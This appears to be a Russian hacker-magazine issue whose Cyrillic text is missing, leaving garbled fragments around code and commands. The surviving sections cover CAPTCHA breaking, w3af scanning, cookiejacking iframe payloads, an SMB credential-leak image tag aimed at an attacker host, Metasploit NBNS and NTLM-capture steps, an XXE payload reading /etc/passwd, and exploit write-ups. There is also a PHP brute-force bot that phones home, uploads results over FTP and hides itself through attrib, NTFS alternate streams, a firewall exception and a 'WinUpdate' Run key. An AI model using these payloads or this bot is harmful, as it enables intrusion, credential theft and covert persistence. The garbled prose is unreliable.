FocalPrice
WebMoney, .
,
,
.
, ,
.
, , , . ,
. $20,
- .
, , ,
: , , .
1. .
: retailmenot.com (,
), chinaprices.ru, . ,
< >.
2. ,
. searchsku.ru
. chinaprices.ru.
3. ,
. . , .
, ebay-forum.ru mySku.ru.
4. - (, , )
.
.
5. .
PayPal. WebMoney Qiwi, ,
, PayPal
.
6. , . ,
. , ,
- .
PayPal
WebMoney
Qiwi
Dealextreme.com
:
:
:
21 40
DealExtreme.com.
- .
:
, , ,
, . :
. ,
. ,
. TinyDeal,
,
.
PayPal ,
.
-,
$15.
, :
Dealextreme ,
: ( ),
.
: .
,
, ,
().
. PayPal, WebMoney. ,
PayPal
, .
$150.
.
, ,- (, ,
). -
$35,
: ,
-
$20.
$2-3.
,
.
: , , -
,
.
Tinydeal.com
:
:
:
7 25
- ,
,
.
, ,
. -,
,
. ,
.
,
(5-7%). (
TD Points),
.
$200
-
Pandawill.com
:
:
:
25 35
-, . , ,
. , .
,
, .
(
).
Pandawill
, ,
.
.
PayPal Visa Master Card,
. . , ,
-:
$50 (
).
:
,
.
NOWSUPPLIER.COM
MERIMOBILES.COM
BUYINCOINS.COM
7 25
,
:
,
( $30 )
.
, ,
-
. , PayPal
, .
,
,
.
.
,
14 25
7 25
-
. ,
.
, 3G-
.
, PayPal ,
.
(, ,
) ,
.
.
.
,
FocalPrice
TinyDeal.
.
:
.
,
PayPal.
. :
- ,
. -
, .
: , , .
! z
PC ZONE
( gursev.kalra@foundstone.com )
CAPTCHA
CAPTCHA,
. -,
,
$1
1000 .
,
.
.
CAPTCHA
CAPTCHA
.
, , .
(,
, , ),
.
, ,
CAPTCHA: . ,
-
TESSERCAP
? ,
CAPTCHA
.
, ,
,
. -
CAPTCHA- TesserCap
, ,
, OCR-
,
. ,
,
McAfee. ?
,
.
-,
www.quantcast.com/top-sites-1.
, Wikipedia, eBay,
reCaptcha.
,
.
,
OCR-,
. TesserCap
:
1. ,
.
2.
Tesseract , CAPTCHA-.
3.
.
, ,
, .
,
.
, ,
.
. MAIN
: Main, Options,
Image Preprocessing.
,
CAPTCHA-, ( ,
),
.
URL- URL, -
. URL- :
CAPTCHA-,
URL- src <img>. , xakep.ru www.xakep.ru/common/rateit/captcha.asp?name=xakep.ru. ,
,
.
12 ,
. ,
. Start
Stop .
TesserCap.
.
Foundstone,
McAfee.
, ToorCon, NullCon ClubHack.
TesserCap SSLSmart.
,
.
Ruby, Ruby on Rails C#.
xakep.ru
. ,
Foundstone, ,
,
.
,
.
,
. ,
,
, .
,
Send To Image Preprocessor.
. OPTIONS
TesserCap.
OCR-,
-, , HTTP,
: ,
, ,
.
.
, OCR-.
Tesseract-OCR,
.
. , , xakep.ru , ,
. ,
? ,
,
xakep.ru ,
: Numerics.
Upper Case? ,
? , . , , ,
\Program Files\Foundstone Free Tools\TesserCap 1.0\tessdata\configs\.
:
Numerics Lower Case,
lowernumeric, tessedit_char_whitelist.
,
.
,
.
,
Http Request Headers. , - ,
. TesserCap
,
HTTP
, Accept, Cookie Referrer
. . - (Fiddler, Burp,
Charles, WebScarab, Paros . .),
Http Request
Headers. , , Follow Redirects.
, TesserCap
.
URL-
,
.
, / ,
.
.
CAPTCHA-
. CAPTCHA-,
Enable
Image Preprocessing,
OCR- Tesseract
.
. IMAGE
PREPROCESSING
.
,
.
.
.
, ,
.
.
1.
CAPTCHA-. ,
, ,
:
for (each pixel in CAPTCHA)
{
    if (invertRed is true)
        new red = 255 - current red
    if (invertBlue is true)
        new blue = 255 - current blue
    if (invertGreen is true)
        new green = 255 - current green
}
CAPTCHA-.
2.
CAPTCHA
Wikipedia
2030%
Ebay
2030%
reddit.com
2030%
CNBC
>50%
foodnetwork.com
8090%
dailymail.co.uk
>30%
megaupload.com
>80%
pastebin.com
7080%
cavenue.com
>80%
.
257
( -1 255) . RGB
:
1. -1,
.
2. -1,
(, )
. 0
, 255
. .
3. ( )
.
, .
,
:
1. Average: (Red + Green + Blue)/3.
2. Human: (0.21 * Red + 0.71 * Green + 0.07 * Blue).
3. Average of minimum and maximum color components: (Minimum (Red + Green + Blue) + Maximum (Red + Green + Blue))/2.
4. Minimum: Minimum (Red + Green + Blue).
5. Maximum: Maximum (Red + Green + Blue).
CAPTCHA
.
4.
CAPTCHA-,
, .
,
Bucket Cutoff.
Passes ,
.
. :
.
TesserCap .
( ).
.
.
,
Save Mask. ,
.
Save Mask .
5.
.
20 (bucket)/.
,
0 12, 0,
,
13 25,
1 . .
,
:
1. (Leave As Is).
2. (White).
3. (Black).
, / ,
.
6. (cutoff)
.
:
if (pixels grayscale value <= Cutoff)
pixel grayscale value = (0 OR 255)
-> ,
(<= => : Set Every Pixel
with value <=/=> Threshold to 0.
Remaining to 255)
CAPTCHA
.
7: (chopping)
, , bucket- CAPTCHA
, .
: ,
,
, 0 ()
255 () .
CAPTCHA , .
,
.
OCR-.
8: .
,
TesserCap ,
, CAPTCHA-
CAPTCHA,
OCR .
.
, ,
.
10:
CAPTCHA-
OCR- .
Solve
, OCR-
.
, ,
.
(Enable Image Preprocessing)
.
9:
-
, ,
, - .
xakep.ru.
,
. ,
, . , (
, )
. , ,
. URL
TesserCap. , 12
, Start.
12 . ,
,
-Failed- ,
. , ,
. .
12
(Send To Image
Preprocessor).
12 , , , ,
(Character Set = Numerics).
Image Preprocessing
. ,
( , ,
) ,
. Smooth Mask
2
. Grayscale buckets
. 154 , ,
, 0, ,
, 255.
, chopping 10.
,
Solve.
714945,
711435.
, , .
, ,
.
pastebin.com, .
xakep.ru,
(Enable Image Preprocessing).
Main , Start,
, . , ,
/ ( Mark as Correct/Mark as
InCorrect). Show Statistics. -,
CAPTCHA. , TesserCap
.
CAPTCHA-
- .
. ,
CAPTCHA-, ,
. ,
,
reCaptcha .
,
,
CAPTCHA.
API , .
(, ), .
:). z
PC ZONE
(oxdef@oxdef.info)
-
- W3AF
WARNING
.
.
w3af
-.
, ,
,
.
W3AF?
- , . , , ,
,
. , ,
. , -:
1. .
2. ().
3. .
4. .
w3af (w3af.org).
- (Web Application
Attack and Audit Framework),
.
.
, :).
,
Rapid7 ! Python, ,
, . w3af
, . , ,
Mozilla Firefox, .
W3AF?
w3af
w3af : .
,
w3af
. , ,
.
, , .
.
. W3af , .
,
. , , .
1. (
discovery-) ,
, -. . -,
webSpider. Discovery- , , , .
,
, .
2. - (
) , , XSS, SQL-, (R)LFI
.
3. Grep- , , UNIX-, . :
grep- HTTP-/,
(
, IP-,
. .).
JavaScript-, :
document.write
document.location
eval
...
- .
UNIX,
sed, HTTP-. hidden- ? !
7. Evasion- IDS. -?
- .
8. Output- : w3af. ,
PDF, - .
9. Auth- : -,
, ,
-.
.
-,
, . , w3af
,
. w3af
auth-, .
, ,
:
SMS, .. Python!
-
, w3af,
. ,
Itter. ,
, , , ,
140 . :)
- :
LAMP (Linux-Apache-MySQL-PHP);
;
;
AJAX;
, , !
- . w3af (,
, ) :
gtkUi , GTK;
consoleUi UI (
, ).
. GUI- ./w3af_gui - 1. :
, , . .
w3af
- w3af
, ,
w3af. , ini-,
w3af, URL, , core-
. , Itter
My Profile, discovery webSpider pykto ( Nikto Python),
grep- DOM XSS
XSS- SQL-. , Start
, . , w3af Log,
. -
.
20 . ,
w3af.
DOM XSS, XSS!
, /index.php, , . Pykto, ,
Apache phpinfo- /test.php.
-
-. Apache/2.2.16 Debian GNU/
Linux PHP. ,
-, URLs -
. HTTP-,
.
2.0
,
-.
-,
JavaScript, AJAX, JSON, HTML5 .
:)
-.
.
- /article.php?id=68,
, , ,
-. , , <Ctrl-U>,
HTML-,
JavaScript HTML.
-, .
-. ,
JS -? ,
Selenium/WebDriver?
, OWASP WebScarab Burp
spiderMan, ,
, discovery-.
. . - 127.0.0.1:44444
( FoxyProxy Firefox,
). SpiderMan
webSpider,
. spiderMan , -. Log- :
[Mon 30 May 2011 12:08:22 AM MST] spiderMan proxy is running on 127.0.0.1:44444.
Please configure your browser to use these proxy settings and navigate the target site. To exit spiderMan plugin please navigate to http://127.7.7.7/spiderMan?terminate .
[Mon 30 May 2011 12:15:29 AM MST] The user is navigating through the spiderMan proxy.
[Mon 30 May 2011 12:15:29 AM MST] Trapped fuzzable requests:
[Mon 30 May 2011 12:15:29 AM MST] http://localhost/index.php | Method: GET
[Mon 30 May 2011 12:15:32 AM MST] http://localhost/user-info.php | Method: GET
[Mon 30 May 2011 12:22:36 AM MST] SQL injection in a MySQL database was found at: "http://localhost/user-info.php", using HTTP method GET. The sent data was: "id=d'z"0". This vulnerability was found in the request with id 3911.
[Mon 30 May 2011 12:27:10 AM MST] Cross Site Scripting was found at: "http://localhost/index.php", using HTTP method GET. The sent data was: "limit=15&u=<ScRIPT>a=/UzmE/%0Aalert(a.source)</SCRiPT>". The modified parameter was "u". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 4042.
, spiderMan, , webSpider
. , - SQL XSS-! , AJAX-,
.
. W3af
, ,
. -
HTTP-
: Telnet, cURL, Wget, Python + urllib,
, :) , . w3af
.
HTTP- ? !
Python. HTTP-,
HTTP-,
.
- URL MD5. , echo -n "admin" | md5sum
, . SQL-
-,
diff. , , ,
,
HTML, AJAX Python. , : , ,
JS-
. -
( ).
History HTTP . , , .
:
, , , 2xx- .
.
,
.
AJAX-
/user-info.php?id=1, . .
Audit request with... , SQL-.
SQL-
! SQL-. :) , ,
.
. PHP
, . HTTP-
-: /user-info.php?id=1 /user-info.php?id=1%2b1,
. SQL-
,
( ).
.
OUTRO
W3af
-. ,
.
, ,
, .
, Python,
.
, , w3af , .
,
(w3af.sourceforge.net) IRC- #w3af
Freenode. z
w3af HTTP-
/ EASY HACK
EASY
HACK
MSSQL
1.
2.
3.
4.
, : ENCRYPT_OFF 0x00.
: ENCRYPT_ON 0x01.
: ENCRYPT_NOT_SUP 0x02.
: ENCRYPT_REQ 0x03.
ENCRYPT_OFF. , ,
. ENCRYPT_NOT_SUP,
. ,
MiTM- ,
,
.
,
Metasploit Framework,
. , , . ,
TCP-,
MSSQL- ,
, , , . ,
, ,
arp-spoofing-,
. f0rki ,
shell-.
UI-REDRESSING
][ ,
clickjacking. ,
. clickjacking
, , uiredressing . ,
, .
, cookiejacking.
Rosario Valotta HITB 2011
. , , HTTPS-! :
IE ( ).
, -.
-, 0-day,
IE. ,
. , IE
, : Internet, Intranet,
. .
, NTLM-
Intranet . , :
Local Machine Zone
Local Intranet Zone
Trusted Sites Zone
Internet Zone
Restricted Sites Zone
- . ,
. , <iframe
src="file://c:/boot.ini">
.
0-day , -
,
. ,
:
<iframe src="file:///C://Documents and Settings/%user_name%/Cookies/%user_name%@google[1].txt"> </iframe>
%user_name% .
, . , Google,
.
-, 0-day-,
clickjacking' content extraction ( BlackHat Europe 2010, goo.gl/Z8YNw).
? iframe ,
.
- , - ,
iframe localhost .
. drag & drop,
.
, , ,
. -
. , content extraction , ,
drag & drop. clickjacking-
, , , .
( Rosario )
(). iframe ,
.
. iframe scrollspeed
. , ,
, () iframe
. , ,
iframe,
, drag & drop', . ,
, Rosario Valotta
(bit.ly/iNxvTb), , , content extraction, JavaScript.
, .
. -,
Windows, :). XP
Vista/7 . XP C://Documents and
Settings/%user_name%/Cookies,
C:/Users/% user_name %/AppData/Roaming/Microsoft/Windows/
Cookies. , ,
User-Agent, .
,
JavaScript. -, , , ,
, .
SMB.
.
: <img src="\\attacker.host.com\any.jpg"></img>.
,
445 , web. , !
.
. 2012-, Microsoft
IE 2011-. ,
Microsoft
.
user_name@domain[counter].txt 87TVLBDW.txt.
. , ,
, IE.
( ).
. ,
, ?
, .
,
.
,
,
. , makensi.es/stf.
-,
, , .
WordPress
DNS NETBIOS
, IP-
DNS.
( ),
. DNSSEC,
, . DNS ,
arp-poisoning,
,
. ,
- , . , , IDS, , -
. ,
.
. , XXX.COM. , , ,
Windows IP- .
IP , hosts (C:\Windows\System32\drivers\etc\hosts). ,
URL
NBNS-
, .
NBNS-.
Transaction ID NBNS-. ,
, , ,
. , MSF
. :
1. NetBIOS-: use auxiliary/spoof/nbns/nbns_response.
2. : Set REGEX *google*.
3. , IP- : set spoofip xa.kep.IP.address.
4. : run.
. (Tim Medin)
(goo.gl/Jz2Q9), NTLM-.
, ,
( makaka), (makaka.
com). Windows ( !). IE ,
. , . ,
NTLM- HTTP ( SMB):
1. : use auxiliary/server/capture/http_ntlm.
2. , : set URIPATH.
3. , -: set SRVPORT 80.
4. : run.
. , NBNS-,
- .
c XXX.com, - ,
( JavaScript),
XXX.com. XXX.
com, ,
DNS NBNS. ,
, -
.
,
.
:
1. NBNS- .
2. web-
( ) , XXX.com (, asdasdasd.XXX.com).
3. , - , NBNS .
4. asdasdasd.XXX.com, , ,
NBNS.
5. XXX.com asdasdasd.XXX.com,
.
,
. ,
(XXX.com),
(.XXX.com).
LOCALHOST WINDOWS
localhost
127.0.0.1. ? , IE, , Windows. , Python urllib2
. , ,
(127.0.0.1)
(0.0.0.0).
- , Eldar Marcussen. ,
IE .NET framework
localhost 127.0.0.1. IE9
, -localhost.
, -, . -,
IP 127 , ,
127.1.2.3,
. -,
hosts (%windir%\drivers\etc\hosts)
localhost: 127.0.0.1 localh0st.
(ivinside.blogspot.com)
(115612, . , .1)
Linux,
, Microsoft Office Acrobat
Reader, XXE- phpMyAdmin.
!
Linux
CVSSv2: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
BRIEF
/proc/<PID>/mem ( <PID>
), Linux
.
2.6.39 #ifdef,
, ,
.
, .
, .
, : ,
2.6.39,
.
EXPLOIT
/proc/<PID>/mem :
static int mem_open(struct inode* inode, struct file* file)
{
    file->private_data = (void*)((long)current->self_exec_id);
    file->f_mode |= FMODE_UNSIGNED_OFFSET;
    return 0;
}
,
. . , ( ):
static ssize_t mem_write(struct file * file,
        const char __user *buf, size_t count, loff_t *ppos)
{
    /* ... */
    struct task_struct *task = get_proc_task(
            file->f_path.dentry->d_inode);
    /* ... */
    mm = check_mem_permission(task);
    copied = PTR_ERR(mm);
    if (IS_ERR(mm))
        goto out_free;
    /* ... */
    if (file->private_data != (void *)((long)
            current->self_exec_id))
        goto out_mm;
    /* ... */
: check_mem_permission self_exec_id.
check_mem_permission __check_mem_permission, :
static struct mm_struct *__check_mem_permission(
        struct task_struct *task)
{
    struct mm_struct *mm;
    mm = get_task_mm(task);
    if (!mm) return ERR_PTR(-EINVAL);
    if (task == current) return mm;
    if (task_is_stopped_or_traced(task)) {
        int match;
        rcu_read_lock();
        match = (ptrace_parent(task) == current);
        rcu_read_unlock();
        if (match && ptrace_may_access(task,
                PTRACE_MODE_ATTACH))
            return mm;
    }
    mmput(mm);
    return ERR_PTR(-EPERM);
}
,
(task == current), , ptrace. ptrace ,
task == current.
? , suid. su:
$ su "yeeeee haw I am a cowboy"
su: user yeeeee haw I am a cowboy does not exist
, stderr ,
. , /proc/<PID>/mem,
lseek() , dup2()
/proc/<PID>/mem, ,
-. . , self_exec_id
, /proc/<PID>/mem. self_exec_id
,
.
, : fork() exec() .
self_exec_id,
. exec(), self_exec_id .
/proc/<PID>/mem,
. su
exec(), self_exec_id.
, ,
dup2 -> exec.
, . , ASLR
, :
$ readelf -h /bin/su | grep Type
Type: EXEC (Executable file)
MS12-005
CVSSv2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
.
web- Office.
Object Packager.
, Object Packager ClickOnce- ,
Office.
, . , ClickOnce
, Windows, .
ClickOnce: -,
, -.
, ,
, -
. ClickOnce
,
.
PowerPoint. Custom Animation OLE-.
,
OLE ( Object Actions): Activate
Contents ( ) Edit Package (
). Activate Contents ,
.
, Custom Animation -
,
ClickOnce- (Full Trust).
.
. Custom Animation ,
PowerPoint . PowerPoint , .
ClickOnce-
, .
EXPLOIT
, MS12-005, :
1. .
packager.dll , ,
( execExtTable).
Python-
,
, .
IsProgIDInList:
.text:02FA72F4 push 11h ; int
.text:02FA72F6 push offset execExtTable ; dangerousTable
.text:02FA72FB push esi ; pExtName
.text:02FA72FC push 0 ; int
.text:02FA72FE call ?IsProgIDInList@@YGHPBG0PBQBGI@Z
; IsProgIDInList(ushort const *,ushort const *,
; ushort const * const *,uint)
,
.
py pl. MS12-005 AssocIsDangerous(),
:
A , .
PO , , 3D-.
EXPLOIT
2. .
packager.dll ,
. CPackage___GiveWarningMsg(HWND hWnd).
execExtTable, ,
execExtTable, .
TARGETS
, .
Adobe Reader
U3D-
CVSSv2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
3D- pdf-
:
4 OpenAction
JavaScript.
14 JavaScript 15.
15 JavaScript- heap spraying,
.
11 3D- .
10 3D-, (,
).
, :
10 (/3D, /U3D).
11 (/3DI, /3DD, /3D,
/3DA).
15 JavaScript- heap
spraying (
3D-).
Metasploit (
):
BRIEF
U3D-.
.
. DEP ROP-,
icucnv36.dll. ASLR JavaScript-, heap spraying.
U3D-, ,
:
U3D 3D-.
3DD () 3D-,
.
3DA () , ,
3D-.
3DI () , . true
, false JavaScript.
DIS () , 3D-
.
process
yes
Description
----------The command string to
execute
Exit technique:
seh,thread,process,none
Exploit target:
   Id  Name
   --  ----
   0   Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3
msf exploit(adobe_reader_u3d) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /home/pikofarad/.msf4/local/msf.pdf
, .
CVSSV2
>
<foo>&bar;</foo>
bar, /etc/passwd,
. , XML-
.
, . :
TARGETS
[
<!ELEMENT foo ANY >
<!ENTITY bar SYSTEM "file:///etc/passwd" >
]
5.0
(AV:N/AC:L/Au:N/C:P/I:N/A:N)
BRIEF
Marco Batista
Local File Including.
, XXE- (XXE XML eXternal Entity),
XML-.
, XML- (, GET -) XML.
xmlDB, :
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
</users>
phpMyAdmin
XML-. , XML- ( -)
.
libraries\import\xml.php,
simplexml_load_string() :
$xml = simplexml_load_string($buffer,
"SimpleXMLElement", LIBXML_COMPACT);
phpMyAdmin
libxml_disable_entity_loader(), XML-.
SECFORCE Metasploit . LFI :
1. phpMyAdmin .
2. XML-, XXE-
.
3. XML-.
4. .
.
TARGETS
>> coding
|qbz| (http://essenzo.net)
PHP-
Windows
.
- C, ASM, - Python. ,
,
PHP. ,
,
.
,
,
- .
WWW
bit.ly/WdbrO
;
3.14.by/ru/md5
;
www.f2ko.de
.
DVD
,
.
. ,
? ,
, , . , php2exe-.
. , , . , ,
.
, ,
. , , ,
, .
, .
. ,
,
.
, ,
.
, . ,
, ,
(), .
,
, exe,
.
:
md5. { } { } { }
( = ),
, ,
. ,
, ,
- .
:
function mySettings()
{
    $settings = file_get_contents(
        'http://adres.com/?do=mysettings');
    if ($settings != '')
    {
        list($status, $statusdata) =
            explode('|', $settings, 2);
        $config = array('status' => $status,
            'data' => $statusdata);
        return $config;
    }
    else
        return false;
}
, , ,
, , |.
, .
():
function bruteHashes($hashes)
{
    //
    file_put_contents('./brute.txt', implode("\r\n", $hashes));
    // ,
    file_get_contents(
        'http://adres.master.servera.com/?do=iamworking');
    //
    passthru('md5.exe brute.txt vocabulary.txt results.txt');
    //
    $uploader = ftp_connect('ftp://adres.master.servera.com');
    ftp_login($uploader, 'login', 'password');
    ftp_put($uploader, './results/'.time().'.txt',
        './results.txt', FTP_ASCII);
    ftp_close($uploader);
    // ,
    file_get_contents(
        'http://adres.master.servera.com/?do=iamfinished');
}
,
,
,
. ,
. ,
,
(- ), , .
, ,
. .
, :
function installVocab()
{
    $vocabulary = file_get_contents(
        'http://adres.com/unique_vocabulary.php');
    file_put_contents('./vocabulary.txt', $vocabulary);
}
. , ,
,
:
, , ,
.
,
-.
,
-.
,
( ):
brute ;
clean ,
;
install ;
exit .
.
- 300 .
.
, , ( )
if (!file_exists('./vocabulary.txt'))
{
    installVocab();
}
startScheduler();
, ,
exe. Bambalam PHP EXE
Compiler/Embedder.
, exe PHP. , , ( !).
PHP 4.0,
. Bambalam :
bamcompile [-options] infile.php [outfile.exe]
PHP DevelStudio
bit.ly/amiS4r
PHP
.
,
,
.
Php2exe
bit.ly/ylV4vR
PHP
.
,
php5ts.dll.
Bambalam Embedder
bit.ly/wpSniZ.
,
GUI
.
,
cURL.
py2exe
bit.ly/3KkIKw
,
, .
,
,
.
Perl2Exe
bit.ly/y29qTB
exe.
,
.
MD5-
, . . -,
,
, , , .
IP- (
,
, ,
NAT), ,
.
. , , ,
lastcallback. , ,
. ,
.
300 (
), ,
. . ,
, , , , |.
, ,
,
. ,
- install|vocab_123123123.txt, install
, vocab_123123123.txt
, .
, , clean. brute.
:
results,
.
.
-, ,
, ,
, .
,
: %CD%\bot.exe.
BAT To EXE Converter 1.5
, invisible
application include : bot., (php5ts.dll) (md5.exe).
, . , .
. , , attrib
'+h' '+s'. :
attrib "%CD%\bot.exe" +h +s
.
NTFS :
cd %systemroot%\system32
type packed_bot.exe>calc.exe:b0t.exe
:
brute|c4ca4238a0b923820dcc509a6f75849b:c81e728d9d4c2f636f067f89cc14862c:eccbc87e4b5ce2fe28308fd9f2a7baf3
FTP-,
, .
results.
, iamfinished.
cd "%systemroot%\system32"
start .\calc.exe:b0t.exe
FTP.
Windows , :
passthru('netsh firewall add allowedprogram %WINDIR%\system32\ftp.exe TCPInfrastructure>nul 2>&1 ');
exe ( , ,
%systemroot%):
passthru('reg add HKLM\software\microsoft\windows\currentversion\run /v WinUpdate /t REG_SZ /d %WINDIR%\packed_bot.exe /f>nul 2>&1');
PHP , .
,
, , ,
.
I can
crack
it!
-,
][-,
. , ,
.
DVD
Can You
Crack It?.
,
,
,
.
, (GCHQ)
Google, ,
, .
FIRST STEP
,
canyoucrackit.co.uk,
HEX- ( ) - Can
You Crack It?. HEX-,
, ,
ASCII,
.
HEX-
IDA Pro.
- . IDA
x86. ,
.
, .
256 ,
0 255,
,
RC4
8 0xDEADBEEF ( ).
, ,
.
, esp,
,
, ,
0xAAAAAAAA.
DWORD, 0xAAAAAAAA.
,
0xBBBBBBBB.
( ) .
, ,
.
iTXt PNG- ( UTF-8).
Base64
Comment ( ).
, ( )
,
:
GET /15b436de1f9107f3778aad525e5d0b20.js HTTP/1.1
GET .
, . exe-,
,
( IDA)
:
__asm
{
int 3;
mov eax, array; array
call eax;
}
, jmp ( ) .
. , .
PNG- -
. PNG,
(
).
SECOND STEP
.
,
,
.
, (r0...
r3) ,
(cs ds ), -
UNIX CRYPT()
crypt *nix
,
.
DES (Data
Encryption Standard).
,
, , 7 .
7 56-
DES,
.
DES . .
,
25 .
, crypt ,
DES.
.
12 .
Base64.
keygen
(flg),
(ip).
, (
hlt, )
: mod 0 mod 1. ,
, ,
.
.
, cs ds . , ,
add r[5], 12, ,
,
(
So you did it
cs,
r5).
far jump ip.
, , ,
, ip
.
.
JavaScript, ,
,
. C.
,
, , :-).
(
hlt)
GET:
GET /da75370fe15c4148bd4ceec861fbdaa5.exe HTTP/1.0
THIRD STEP
GET- , .
,
Cygwin. ,
,
keygen.exe,
.
. keygen URL
. :
licence.txt, ,
.
,
Stage one licence key Stage two licence key,
,
.
-
,
,
. .
,
,
,
,
.
,
,
,
- .
, ,
, ,
,
,
.
,
mov, movzx, add, xor, shl, shr
. ., (
).
,
,
.
,
.
(SBox'), ,
,
(
), ,
() . .
-.
,
.
,
(key schedule) /
.
(
key schedule
).
,
, .
crypt ( Cygwin)
. ,
, ,
. IP
(URL ) DNS.
, URL :
canyoucrackme.co.uk. keygen.exe GET- :
GET-
:
key.txt,
So you did it
, ,
,
,
, ,
.
SUMMARY
GET /%s/%08X/%08X/%08X/key.txt HTTP/1.0
, - .
,
,
.
,
jump.
DWORD- firmware ( ).
,
,
7z, . , , ,
, .
RC4
GET /hqDTK7b8K2rvw/A3BFC2AF/D2AB1F05/DA13F110/key.txt HTTP/1.0
,
-
.
,
. , GCHQ
, everyday heroes, ,
.
.
. z
RC4 ( ARC4)
.
,
RSA Security, 1987 . RC4 ,
.
8
,
0 255 (S)
: i j. RC4 :
(KSA)
. S
40 256 . KSA
:
for i from 0 to 255
    S[i] := i
endfor
j := 0
for i from 0 to 255
    j := (j + S[i] + key[i mod keylength]) mod 256
    swap values of S[i] and S[j]
endfor
.
:
i := 0
j := 0
while GeneratingOutput:
    i := (i + 1) mod 256
    j := (j + S[i]) mod 256
    swap values of S[i] and S[j]
    K := S[(S[i] + S[j]) mod 256]
    output K
endwhile
AES
RC4
SSL,
WEP, Adobe PDF
Microsoft Office. ,
. ,
PDF- RC4
40 ,
.
MS Office -
RC4
life4u
:
SMS
INFO
-.
,
.
30 !
-
?
,
SMS, ?
?
? -
, .
, - ,
,
(,
1234).
SMS, -
, .
,
,
. SMS-
SMS-.
,
. SMS
( WebMoney .)
:
(,
) ,
-. SMS
. , , ,
, , -
?
, ,
,
. ,
? ,
.
,
, ,
(
, -!)
,
.
, ,
.
?
, , ,
.
,
.
(,
,
,
,
),
.
.
,
,
,
.
SMS-.
50%
, , , . ,
( , ).
SMS- ,
,
, .
(,
, . .), / (, ,
, -
. .).
.
,
SMS-,
web-
.
,
.
.
SMS-.
, , , . , , .
,
. SMS-
(, ,
),
. ,
.
, (,
).
- (,
) ,
, , , -
depositfiles
?
,
.
.
-
,
, - .
,
.
,
(,
),
IP-
,
.
,
.
, , ,
, , ,
,
!
, . SMS- ,
.
( ).
24 , ,
(
,
).
? ,
, , .
50
, ? , ,
( ,
, ).
, ,
,
.
. , -
,
- , ,
?. , ,
SMS,
,
,
.
,
? ? .
,
, .
,
,
?
?
, .
, 1. , ,
( ,
, , ). , .
? , :
,
.
, , , , .
, ,
! , :
.
, ,
, ,
!
,
, -
. ,
, ,
-, ,
. ,
, !
(welcome back,
!). OK,
, .
.
2.
,
,
.
, ,
,
, ,
.
!
,
,
.
. ,
.
:
?
100 . ,
,
,
.
, ,
-
, ,
( ?)
.
, ,
,
.
, ,
.
.
! , ,
,
.
: http://loh.ru/?pid=15991&subid=25483.
, . ,
, -
,
.
,
,
,
(
][),
.
. , ,
.
, , .
, ( ).
.
SEO-
. SEO-
, .
.
, , ,
, . .
. (
,
). , ! z
Jinconvert.ru .
: , ,
, ,
. , ! , ,
, 5 %
-.
Loadpays.ru ,
,
-.
.
,
.
Convert-plus.ru ( info-center.
cc) ,
,
. .
X-Tools
:
NEOx.
URL:
bit.ly/xSLk8n.
:
Windows.
:
famatech.
URL:
radmin.ru/products/
ipscanner.
:
Windows.
:
Suicide[Vll].
URL:
r00t.in/showthread.
php?t=18056.
:
Windows.
PE TOOLS
ADVANCED IP SCANNER
DEATH-MOBILE
- Radmin,
Advanced IP Scanner.
, .
:
1. .
, , , HTTP, HTTPS FTP,
.
2. Radmin. Radmin,
Radmin Server
. ,
,
Radmin Viewer.
3. .
.
4. Wake-On-LAN.
, Wake-On-LAN.
.
SMS,
. 75 120 . ,
, , , .
Mail.Ru. 100 300
.
,
. :
mymegaemail@mail.ru:passw
login@bk.ru:pass
, ,
. Death-Mobile
(, , ),
, ,
,
.
.
:
al-chemist.
URL:
al-chemist.ru/
dnfinder.html.
:
Windows.
:
Z.Razor (ZerveRTeam).
URL:
www.zerverteam.com.
:
Windows.
:
Marcello Pietrelli &
Gianni Baini.
URL:
bit.ly/ukWQSX.
:
Windows.
;
;
;
;
(
) - viagra.
com, -
. ,
-
xakepviagra.com: [a-z]{5,5}viagra.com.
!
:
. .
URL:
z-oleg.com/secur/aps.
:
Windows.
WEB TOOL
FILES TERMINATOR
APS !
Web Tool ,
GET- POST-.
,
/// //- . .
(
Data UserAgent)
:
,
. Files Terminator.
,
, ,
.
, , . ,
,
,
.
:
1. .
2. , HMG IS5.
3. .
4. , P50739-95.
5. , DoD
5220.22-M(E).
6. , VSITR.
7. , RCPM TSSIT OPS-II.
8. .
9. .
#user# ,
#pass# ,
#md5(user)# md5,
#md5(pass)# md5,
#token1# #token(1-X)# ,
#count# .
, , .
(,
, X )
(
< ).
:
1. source-:
nick;pass .
2. : , .
3. :
.
MALWARE
2011
. , :
,
,
.
[Fig. 1 (diagram), box labels: Load MBR (real mode); Load VBR (real mode); load malicious MBR/VBR; Load bootmgr; NT kernel modifications; Load winload.exe or winresume.exe (real mode/protected mode); load rootkit driver]
. 2.
. 3. VBR
[Fig. 4, Olmasco (disk layout). Before infecting: MBR Code, MBR Data, Bootmgr Partition, OS Partition, Unpartitioned Space. After infecting: MBR Code, MBR Data, Bootmgr Partition, OS Partition, Olmasco Partition.]
64- . 2010
64- Win64/Olmarik
(TDL4), Rovnix,
ZeroAccess (update), TDL4 (update), Carberp, Olmasco ( MaxSS). ,
. , . 1.
PoC-,
.
(MBR) ,
, -
. 5. Olmasco
. 6. Olmasco
,
.
. - - ,
.
Stuxnet,
Duqu ( Stuxnet). , ,
,
Stuxnet (, , :)).
Duqu .
, ,
0-day- CVE-2011-3402
,
;).
--! !
, Olmasco.
, VBR
(Volume Boot Record)
. VBR
, . 3.
,
MBR. , , .
, . .
,
(. 4).
.
,
.
. 5.
- . 6.
, IDA Hex-Rays
.
.
. 7.
, Olmasco, TDL4,
-, kdcom.dll.
WinDbg,
. :
(
),
kdcom.dll .
- - ,
Bochs
IDA Pro.
, Olmasco ,
TDL4
.
